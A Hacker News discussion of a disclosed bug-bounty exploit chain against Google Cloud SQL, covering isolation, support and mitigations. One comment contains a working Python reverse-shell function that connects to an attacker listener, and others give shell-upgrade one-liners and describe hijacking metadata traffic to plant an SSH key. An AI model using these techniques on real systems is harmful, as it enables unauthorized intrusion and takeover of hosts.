Hacker News
How to contact Google SRE by dropping a shell in Cloud SQL (offensi.com)
639 points by fanf2 on Aug 19, 2020 | 98 comments

> One of our interesting findings was the iptables rules, since when you enable Private IP access (Which cannot be disabled afterwards), access to the MySQL port is not only added for the IP addresses of the specified VPC network, but instead added for the full IP range, which includes other Cloud SQL instances.

> Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.

I'm not convinced by this, I'm not sure it is vulnerable in the way the author is suggesting "they could be targeted by an attacker-controlled Cloud SQL instance".

First of all, GCE has firewall rules outside of iptables. But the main thing is that the way Cloud SQL does Private IP is via VPC peering. Google creates a VPC on their side, runs MySQL in it, and peers that VPC with your VPC. You actually tell Google what CIDR range to use in the their VPC (the Cloud SQL VPC).

I don't think it is fair to assume that all customers are in the same VPC and the same subnets, with routes between them and no GCE firewall rules blocking them.

We found every Cloud SQL instance runs in a Google-owned project called "speckle-umbrella-<num>", with <num> being a number between 1 and 80. Each speckle-umbrella-* project contains several Cloud SQL instances, of different customers, and they do seem to be on the same network and without proper firewalling, because we ran zmap and could see several IPs with the MySQL port open (we did not try to connect to any of them though).

This problem would have probably been avoided if Cloud SQL used different tenant projects per customer (Something most other GCP services do), but for some reason it doesn't do that.

That is interesting. There is some magic networking going on if Google allows every customer to allocate an IP range of their choice, and the customer can use all the IPs in that range, and Google runs multiple customers on the same network (same VPC and subnet).

A project can contain multiple VPCs. And a VPC can contain multiple subnets, but not with overlapping ranges.


I’d agree. The main risk might be wider access within the customer's VPC (so lateral-movement risk). But it’s hard to know without understanding the wider environment.

The lengths you have to go to to talk to a real person at Google!

On a similar note, if you ever wondered how to delete your facebook/social media account, you can just upload porn

Alternatively, you can go on teamblind to chat with one AND get berated for having a lower TC!

We had an issue with our GKE cluster once, which first threw an unknown error during a (much anticipated) bug fix release, and was subsequently stuck in some kind of loop. No other deployments could be created, three notifications about an unknown error were spawned per second, the audit log was overflowing. Tried to reach someone at google, no chance. The situation fixed itself after a few days, presumably some kind of timeout was reached.

This is Google Cloud GKE? You can't speak to support there within a few days on a paid account when their systems completely break?

Unless you pay for a separate support subscription, no. Not even if it’s their systems at fault.

I mean, this seems fair to me. If you want support, you have to pay for it.

If I'm paying for a service, I expect to be able to speak to someone when that service breaks. If Google Cloud breaks my GKE cluster, it's unreasonable that I can't get anyone to go and fix it without having to pay extra money.

If I break it, sure, fine, no problem. If it's their fault, I expect to be able to hold them to account.

That's absolutely not the agreement. If the service breaks you will be eligible for SLA credits if the service downtime exceeded the SLA target.

The GKE SLO is something like no more than 3.5 hours of downtime per month.
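For what it's worth, that figure falls out of the arithmetic for a roughly 99.5% monthly uptime target (the exact SLO percentage here is my assumption, not something stated in the thread):

```python
# Allowed downtime per month for a given availability target.
HOURS_PER_MONTH = 730  # 24 * 365 / 12, on average


def allowed_downtime_hours(availability: float) -> float:
    """Hours of downtime per month permitted by an availability SLO."""
    return HOURS_PER_MONTH * (1.0 - availability)


# A 99.5% target permits about 3.65 hours of downtime per month,
# in the same ballpark as the "something like 3.5 hours" above.
print(allowed_downtime_hours(0.995))
```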

"I expect to hold them to account".

No - if you are not paying for support you will just be able to claim the credits. You do this by filling out a form within 30 days. That's it.

I, and I'm sure others, appreciate this response. But I think if someone is under the belief that "I expect to hold them to account", then the only appropriate response is: "Then GCP is not for you"

Not entirely true. If you have a business need that demands this level of holding another big company to account / getting some response, then you pay for it.

I think google's higher-end service level starts with a $150K/year base fee + a cut of spending. That's actually a pretty good deal (1 FTE) to have your back much better covered when there are issues - I think they work toward 15-minute response times there. Plus they can help you avoid screwing up your own redundancy planning through reviews of your setup.

What wasn't clear from the parent is whether they expect to hold google ($100B+/year) to account while spending $2,000/month - that isn't going to happen at all, as google has already outlined how they will compensate you for downtime.

Finally - for really large deals you can negotiate with their sales folks.

An important distinction, absolutely.

This is all typically agreed upon well in advance of signing any kind of contract via SLAs and whatnot. So none of this should be a surprise after you've come on-board.

The /mysql/tmp/greetings.txt trick was cute

but do kids these days not know about https://linux.die.net/man/1/wall ?

Do adults these days not know that wall(1) doesn't work unless you have a proper login session and tty, which a reverse shell as OP used certainly does not do for you? :-)

These systems are stripped down to the bare minimum. There's no reason to believe that every "standard" program, and certainly not setgid programs like wall or write, would be present.

All you need is write access to the pty fd (or in the case of a reverse shell, just the fd of the tcp socket). The SREs could talk to the hackers and the hackers could just echo stuff in their terminal which the SREs could read. Writing a file to disk is less l33t, but more straightforward :)

Edit: I think I was wrong; you can't manipulate network socket fds this way, you'd have to use ptrace() on the process. If it were a real shell with a pty I believe what I suggest could work, but reverse shells don't open ptys.

The "# cat greetings.txt" has a # suggesting they sorted out a real pty somehow. Or it was faked later :)

The usual trick to get a pty is `script /dev/null` by the way, if that command is available
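If `script` isn't on the box, another common fallback (assuming a Python interpreter is available - not something the article confirms was there) is Python's `pty` module:

```python
import pty

# Allocate a pseudo-terminal and run a shell attached to it, proxying
# the pty's I/O over the current stdin/stdout (e.g. a reverse shell's
# socket). This is what gives you job control, a prompt, etc.
pty.spawn("/bin/sh")
```

In a reverse shell this is usually invoked as the one-liner `python3 -c 'import pty; pty.spawn("/bin/sh")'`.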

I prefer https://linux.die.net/man/1/write to contact a specific user on a console (if they have `mesg y`). Learnt it and played a lot with it during high school days on an HP-9000 where terminals were actual dumb terminals. It was fun!

> wall (an abbreviation of write to all)

I didn't know what it stood for, at least :)

`man wall` - always a good introduction!


    NAME
        wall - write a message to all users

Nice work and writeup. All stemming from very basic mistakes -- SQL and command injection.

Worrying that the CloudSQL internals (like the private IP range) aren't strongly walled off. It will be interesting to see how this changes in response to the researchers' work.

Argument injection rather than command injection, but yes.

The canonical document on argument injection is here btw:


looks like a shortcut:

> the container was configured with the Docker host networking driver (--network=host).

unreal. lol.

Probably wasn't meant to be a security boundary.

This is the type of write-up that used to appear on hackernews. Great work!

It is evidently the type of write up that is still posted to HN.

Yep, we see this less and less

HN was never really about this kind of hacking as far as I can tell. Mostly about hackers in the broader "creative problem solving" sense.

It used to be 'Startup News'.

Silicon Valley Crier

Ah, I remember the olden days of HN well. When the front page rang with shouts of "HERE YE, HERE YE, THINGS YE SHOULD KNOW ABOUT EQUITY DILUTION!"

Are those kinds of explorations even legal? I understand there were no wrong intentions, just curiosity.

I want to read more about things like this, but it feels reckless on the author's part?!

Legal, encouraged, and rewarded. Bug bounty programs allow hackers to do these kinds of explorations. Although most programs advise you not to do anything once you get code execution, as it might break things in production, so the final part where they started intercepting traffic might not be something I would do. But they took a calculated risk - this is a docker container that does no critical work, and it would be interesting to see if we could break out of it. So that's fine.

You can read up more of such reports at hackerone.com/hackitivity or just searching about bug bounty writeups for X organization

Would it be illegal without the clear terms allowing it in the context of a bug bounty program?

Almost certainly

your hackerone link:

"Page not found

The page you are looking for does not exist. "

You have to realize something, and it's true for Azure, AWS and Google (practical experience):

You have to pay for your support, and it's not cheap.

It's a good thing on one side: you get yourself a cheaper self-service solution and you can use a ton of stuff until you really need support. It's a bad thing if you haven't thought about this, because support costs money.

Big company with a support contract with Google: It's awesome. Srsly. You get an answer within the next 4h, they will experiment, they will talk to the product teams, they will keep you posted, etc.

Yes, I have experienced both the "quasi direct line" and the "just a startup" side. Things are different. And it does make sense that things are this way. :-)

Thank you!

CloudSQL (an expensive wrapper around mysql) restricts you from changing wait_timeout (which is really terrible when using cloudfunctions) or innodb_flush_log_at_trx_commit. Now! With my own reverse shell I can finally edit the CloudSQL variables and contact an SRE.


Google cloud SQL does not prevent you from changing wait_timeout (https://cloud.google.com/sql/docs/mysql/flags)

However, it seems like innodb_flush_log_at_trx_commit is not supported indeed.

The write-up is excellent, but here is a tl;dr:

The Google Cloud console offers a way to export data into cloud storage based on a SQL query expression.

By exploiting a SQL injection vulnerability related to that SQL query expression field, the attacker learned that they had file write access to /mysql/tmp.

The attacker found a second vulnerability affecting the API endpoint used to export data. This endpoint invokes mysqldump behind the scenes.

Then, the attacker created a database with a malicious plugin embedded in a BLOB. This plugin is a C program that creates a shell process whose standard input and output file descriptors are aliases for a socket file descriptor, creating a "reverse shell" through which the attacker can execute commands remotely.

Then, this malicious database was imported via mysqldump, and the malicious plugin was written to /mysql/tmp, then loaded, thus executing the malicious plugin.

Using the reverse shell created by the malicious plugin, the attacker found that the process was running in a Docker container using host networking, which could be used by the attacker to monitor network traffic on the host VM.

Using traffic monitoring, the attacker found traffic related to the Google Guest Agent, and then used a TCP connection hijack attack to hijack connections to the Google Guest Agent.

The connection hijacking was used to trick the Google Guest Agent to authorize a new SSH user, which was then used to escape the Docker container VM.
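The core fd trick of the reverse-shell step can be sketched briefly - a hedged illustration in Python, whereas the author's actual plugin was a C program loaded into MySQL:

```python
import os
import socket


def reverse_shell(host: str, port: int) -> None:
    """Connect back to an attacker-controlled listener and attach a shell."""
    s = socket.create_connection((host, port))
    # Alias stdin/stdout/stderr to the socket, as the plugin does with
    # dup2() before exec'ing a shell.
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    # Replace this process with a shell; all shell I/O now flows
    # over the TCP connection.
    os.execv("/bin/sh", ["/bin/sh", "-i"])
```

The attacker runs a listener (e.g. `nc -l <port>`), the victim process calls `reverse_shell(...)`, and the attacker gets an interactive prompt over the outbound connection.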

Thank you! The article lost me after the reverse shell, but your explanation helped me to understand.

The Google CTF event is this weekend; I believe it's not too late to gather a team, register it, and take part. Such events are a very special kind of fun; I participated in a CTF recently, and quickly understood the limits of my knowledge, as well as the multitude of ways to enrich a given context and exploit it.

You had to scroll all the way down the article, but:

>Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.

Anyone care to expand on that? Would that be common practice?

They're making a reasonable assumption for a bare-metal network, but their conclusion doesn't hold for Google Cloud (and likely Azure/AWS). A customer's Cloud SQL instances do not live in the same VPC as another customer's, and in Google Cloud, VPCs are fully isolated -- an IP range in VPC A is a distinct network from the same range in VPC B, and the two cannot communicate unless there is a Cloud VPN, VPC peering, or a multi-NIC instance acting as a bridge between the two. The broad firewall rule is harmless; I must admit I'm not even sure why the iptables rules are there at all. Probably something about security and onions.

Source: I work in GCP support.

If you work in GCP support, have you ever looked at the Cloud Spanner project(s) in Pantheon? There are thousands and thousands of Cloud SQL VMs sitting in one project, so it's absolutely plausible that there might be some traversal possibilities.

Hopefully not much in prod, but I'm sure there are a lot of staging and dev databases which aren't protected by meaningful credentials.

I don't think this would really happen. You aren't likely running directly on bare metal; you're probably still encapsulated within a VM. The host system will also have its own set of layer-2 and layer-3 firewall rules, in addition to ARP locks, etc.

It depends on what else is on the same VPC network. IP address spaces are virtual here.

In practice, this network may only contain instances of limited use cases.

Just remembered - a long time ago, in a galaxy far, far away, to drop into debugger - and get superuser permissions - on BESM-6 one could launch a clone of "Colossal cave" on a terminal, get to a particular place inside and wave a magic wand...

Wow, thanks for the nostalgia trip!

I think I might alias "XYZZY" to "sudo -i" :)

That must've been such an exciting moment to have someone say hello.

Chilling too.

More importantly, it means those same employees probably have unaudited access to the data in your cloud SQL database.

If SRE can write a file to the filesystem, they can totally copy the database files out too.

I completely support SRE being able to log into instances for debugging, but them being able to do that without leaving an audit trail visible to me, the data owner, isn't up to modern standards IMO.

As far as I can tell, there is nothing in the writeup that suggests the file wasn't there from the beginning and present on all Cloud SQL instances. I know this was a standard practice in a few of the products I worked on where we expected the first few layers of security/obfuscation would be peeled off by curious outsiders.

This seems much more likely than OP's exploration being detected in realtime, then someone SSHing into the container manually to put a message.

Disclaimer: I work at Google, not on Cloud SQL, and don't know anything specific about that greetings.txt.

> Not long after we started exploring the environment we landed our shell in we noticed a new file in the /mysql/tmp directory named ‘greetings.txt’

I interpreted the "new" as meaning that it wasn't there before

I work on Cloud SQL, we definitely don't add a file like that.

It could be the case that SRE recognized our accounts since we are hunting on a daily basis.

In rare cases SREs reach out to ISEs, who contact us on their behalf. In this case a file was added. I personally don't see any reason why this would be a bad thing; it's a managed service and we tried to attack it, after all. No data was removed, nor is there any indication that there are no audit trails. I hold both the ISEs and SREs in extremely high regard. (If you try to hunt for bugs in GCP you will find out why.)

Cloud SRE should have a button to click to grant themselves access to an instance.

That button should create for them a fully logged SSH connection to the VM, and the data owner should be notified that SRE has connected. The data owner should then be able to see the commands executed via the SSH connection, and also request an explanation of what the SRE was doing.

The vast majority of instances are going to be things like "your instance hit a SIGSEGV, we logged in to grab the crash dump" or "your instance had much higher usage than all other users, we logged in to run tools to find where it was going".

That would be acceptable since I could immediately close my account once SRE had connected due to the data breach.

To be more serious, it would be unacceptable for me that an employee can, for whatever reason, access my instance without my express permission and oversight. Even crash dumps could contain very sensitive information.

Well, it's called managed infrastructure for a reason.

Even in managed infrastructure, taking data out of the infrastructure is unacceptable.

I don't think there is a good solution yet for products like cloud SQL to make it theoretically impossible for an evil hosting company to steal your data.

But it should be possible for a client to audit all accesses, and the audit logging system be robust enough to catch evil employees.

It doesn't have to be impossible to access, but the hoster shouldn't just log into my system and download arbitrary data from it. I'm not asking for perfect confidentiality, just contractual confidentiality.

Who audits the audit system? If I'm an evil employee I'll make sure my requests don't show up there.

So a company goes to the effort of creating an audit system, but gives everyone the ability to modify the history?

If your threat model is a single rogue employee, auditing systems address the issues. If your threat model is "the whole company works against you", you probably shouldn't be using any company to host your infra, so host it yourself, because there's no way to be secure in that situation.

Sounds like you should operate your own infrastructure.

He could just use AWS.

How do we know the same thing can't happen there, with respect to employees accessing data, etc? My point is unless you manage it yourself, you don't know.

In the tcpdump screenshot the hostname is something.bugbounty.internal. Was the author running against specific bugbounty machines or something?

The tcpdump screenshot was created after the bug was fixed. It demonstrates the interception of traffic generated by the Google Accounts Daemon on an instance running within my personal project.

Curious about the container capabilities that enabled them to attack the host network: per the docs [1], containers do not get `CAP_NET_ADMIN` by default, but they do get `CAP_NET_RAW`. I assume that's what allowed them to inspect/inject network traffic and thus spoof the HTTP response.

So `docker run --net=host --cap-drop=NET_RAW` seems like it might be a good idea. I wonder if it's still needed for `ping` and such in modern Linux?

[1] https://docs.docker.com/engine/reference/run/#runtime-privil...
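As a quick probe (my own sketch, not from the article): opening a raw socket fails with EPERM unless the process holds `CAP_NET_RAW` (or is root), which is exactly the capability tcpdump-style sniffing and packet injection rely on:

```python
import socket


def can_open_raw_socket() -> bool:
    """True if this process can open a raw ICMP socket, i.e. it holds
    CAP_NET_RAW (or is running as root). Dropping the capability makes
    this - and tools like classic suid-less ping - fail."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW,
                          socket.IPPROTO_ICMP)
    except PermissionError:
        return False
    s.close()
    return True
```

Running this inside `docker run --cap-drop=NET_RAW ...` should return False; in a default container it returns True.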

Mostly it's not needed for ping, but the config is not yet great in all distros. I talked about this in https://docker.events.cube365.net/docker/dockercon/content/V...

Hey, I recognize Offensi from the Liveoverflow video! [1]

I've been reading some Google VRP writeups [2] in order to inspire me in my bug bounty journey. There are a few by Ezequiel Pereira and Offensi. There's some really cool stuff, that go beyond XSS.

[1] https://www.youtube.com/watch?v=E-P9USG6kLs [2] https://github.com/xdavidhu/awesome-google-vrp-writeups

I had never heard of a reverse shell before. That is a very neat and simple little trick!

You might also like https://en.wikipedia.org/wiki/Shellcode if you haven't heard of that either.

Shellcodes are binary strings that you write to memory or execute another way (like this plugin situation) through an exploit to actually initiate a shell under that process' user id. This can be local on a setuid process for escalation or remote (there are 2 other types in that article in addition to the reverse shell).

Thanks for the share!

Heh, glad I wasn't the only one. When I read that part I thought to myself, "Damn, how did I not know that was a thing".

This is straight out of pentesting 101! Extremely common trick, practically the #1 thing everyone does after they get code execution.

I was able to follow this until the point of escaping the container.

How did they get the user wouter created on the host and how did it have sudo access?

GCP supports remotely loading public ssh keys onto a box. They do this using the metadata endpoint - this is (in theory) a trusted API endpoint available to instances. IAM actually uses this - when you call other services, client libs reach out to the metadata endpoint and get IAM creds to send with each request.

Anyway, they have a local process that polls the metadata endpoint and adds authorized keys on the host. So you can e.g. upload your public key in the web UI, their metadata endpoint will serve it up on your instance, the guest agent will poll the metadata endpoint and add your key to the authorized_keys file.
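The fetch side of that polling loop boils down to an HTTP GET against the metadata endpoint (the hostname, path, and required `Metadata-Flavor` header below are the documented GCE ones; the function itself is just a single-fetch sketch, while the real guest agent long-polls with a timeout parameter):

```python
import urllib.request

METADATA_SSH_KEYS = "/computeMetadata/v1/instance/attributes/ssh-keys"


def fetch_ssh_keys(base: str = "http://metadata.google.internal") -> str:
    """Fetch the project/instance ssh-keys attribute from the metadata
    server, as the guest agent does before updating authorized_keys."""
    # GCE requires this header, so a naive redirect or SSRF can't read
    # the endpoint by accident.
    req = urllib.request.Request(
        base + METADATA_SSH_KEYS,
        headers={"Metadata-Flavor": "Google"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()
```

Note the scheme: plain HTTP, which is what made the response spoofable from the host network namespace.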

These folks spoofed a response from the metadata endpoint. They used https://github.com/kpcyrd/rshijack to inject their own hand-crafted public key, which the guest agent happily added to authorized_keys (and created the wouter user).

They then ssh'd using their key:

> ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost

> Once we accomplished that, we had full access to the host VM (Being able to execute commands as root through sudo).

Looks like they had passwordless sudo as well.

What's a mitigation for the spoofed packet? TLS or something of the sort?

If the docker container was running with something other than --net=host, it could have been avoided easily with standard networking concepts (route tables with reverse path filtering, or iptables rules); even if the attacker somehow managed to get CAP_NET_ADMIN in the container, the host network namespace would still refuse the packets. Although, with --net=host you could actually add iptables rules that match based on the cgroup and limit the IPs/ports allowed. It'd also be possible to filter the container's syscalls with seccomp. I'm not entirely sure why the container had CAP_NET_ADMIN at all, which is required for tcpdump and the man-in-the-middle. Also, using user namespaces would have limited the attacker's abilities even if they had root in the container. A lot of defense-in-depth techniques are possible here.

There's also: simply not leaving the gcp login backdoor open. We run our gcp instances similar to ec2: on first boot we take the ssh keys from the metadata service and lay them down and do not run the GCP agent, we have standard config management + ldap for login after the first boot. This means that a hacker gaining access to your GCP credentials can't gain a shell on an existing instance trivially.

Well, for one, not giving the container access to eth0 on the host. Ideally the container would be configured with its own network namespace; the portion of the article that mentions host network mode is talking about this. Instead of eth0 in the container only being able to see its own traffic, due to how it was configured it could sniff and spoof traffic directly on the host's interface.

But yeah, it seems strange to me that the metadata endpoint isn't secured via TLS. I guess they figured they had sufficiently prevented any kind of MitM attack (but obviously not in this case) so it was unnecessary?

GCE uses this tool to allow a central metadata server to manage users: https://github.com/GoogleCloudPlatform/guest-agent#account-m...

The host VM had this running. Since they had access to the host's network (due to running in a `--network=host` container), they were able to spoof the response from the metadata server to say a new user should be added to `.authorized_keys`, with their supplied public key. The guest agent automatically adds the new users to the `sudoers` group, also giving them sudo access.

I'm curious why this host would have this running on it? Do GCP VMs co-locate with cloud SQL instances? I'd think it'd be separate infrastructure but maybe Google is just really good at binpacking (likely).

Cloud sql instances are actually running on GCE VMs, as suggested by the post, which makes sense as well.

> Most of the time, we were able to type fast enough to get a successful SSH login :)

I thought it would have been automated by a script. Either they are super-fast typists or the metadata server is quite slow!

Looks like the metadata service uses HTTP long polling ("This request also includes a timeout (timeout_sec=<TIME>)"), so I think they had a <TIME>-second head start in racing against the real metadata response.

All this is an interesting read knowing so many people are still using MySQL 5.7. No announcement this week on new version support.

Will we ever be on MySQL 8?

This is excellent, I wonder how to reach such a level of understanding.

